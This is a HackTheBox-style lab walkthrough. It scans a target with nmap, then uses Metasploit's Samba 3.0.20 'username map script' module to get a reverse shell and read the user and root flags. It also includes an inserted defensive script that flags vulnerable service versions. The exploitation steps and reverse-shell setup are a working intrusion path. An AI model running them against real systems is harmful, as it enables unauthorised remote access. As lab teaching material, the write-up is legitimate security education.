Step 1: preparation
- Connect to the VIP HTB VPN
- Add $IP variable to shell for faster operation
IP=10.10.X.X
echo $IP
Step 2: enumeration
I first start with a basic nmap scan
nmap $IP
This scan returns "Host seems down. If it is really up, but blocking our ping probes, try -Pn".
So I try with the related flag
nmap -Pn $IP
And it returns that 4 ports are available
Given that, I make a more precise (and longer) scan
nmap -Pn -sV -sC $IP
I can see that vsFTPd is on version 2.3.4 and Samba is on version 3.0.20.
It should be enough for exploitation.
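Seen from the defender's side, the same version information can be checked automatically. The script below is an added example, not part of the original write-up: it reads nmap -sV output and flags the two versions named above. The function names, the watchlist format and the sample scan are assumptions made for this example.

```shell
#!/usr/bin/env bash
# Added example: flag service versions in nmap -sV output against a watchlist.
# Entries are "product|version", separated by ";". The two entries are the
# versions this write-up singles out; the format itself is an assumption.
WATCHLIST='vsftpd|2.3.4;samba smbd|3.0.20'

# flag_versions: reads nmap normal output on stdin and prints
# "port product version" for every open port matching a watchlist entry.
flag_versions() {
  awk -v watch="$WATCHLIST" '
    BEGIN {
      n = split(watch, rows, ";")
      for (i = 1; i <= n; i++) {
        split(rows[i], f, "|")
        prod[i] = f[1]; ver[i] = f[2]
      }
    }
    # Port lines look like: 21/tcp open ftp vsftpd 2.3.4
    $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
      banner = ""
      for (k = 4; k <= NF; k++) banner = banner (k > 4 ? " " : "") $k
      low = tolower(banner)   # nmap may print vsftpd or vsFTPd
      for (i = 1; i <= n; i++) {
        v = ver[i]; gsub(/\./, "[.]", v)   # match dots literally
        # The version must end at a non-version character, so that
        # 2.3.4 does not match 2.3.45 and 3.0.20 does not match 3.0.200.
        if (low ~ ("^" prod[i] " " v "([^0-9.]|$)"))
          print $1, prod[i], ver[i]
      }
    }'
}

# Constructed sample of nmap -sV output (not output from this target).
sample_scan() {
  cat <<'EOF'
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 8.9p1
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
8021/tcp open  ftp         vsftpd 2.3.45
EOF
}

sample_scan | flag_versions
```

On a real inventory scan, pipe the nmap output into flag_versions instead of using sample_scan.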
Step 3: exploitation
Samba 3.0.20
A little search in msfconsole gives me a result named Samba "username map script" Command Execution.
So I use this module and check which options are available
msf > use 0
msf > show options
RHOSTS is empty and required, so I set it
msf > set RHOSTS $IP (replace $IP with the real target IP)
NOTE: LHOST needs to be set to the HTB VPN TUN interface, not your local IP.
And then I launch the exploit
msf > exploit
I am now in a reverse shell!
cd home
ls
- ftp
- makis
- service
- ...
cd makis
ls
- user.txt
cat user.txt
The user flag is done.
For root, I go back to the root of the shell, navigate to the root folder and get the root.txt file.
Step 4: that's it
If you want to subscribe to the HackTheBox Academy, you can use my referral link!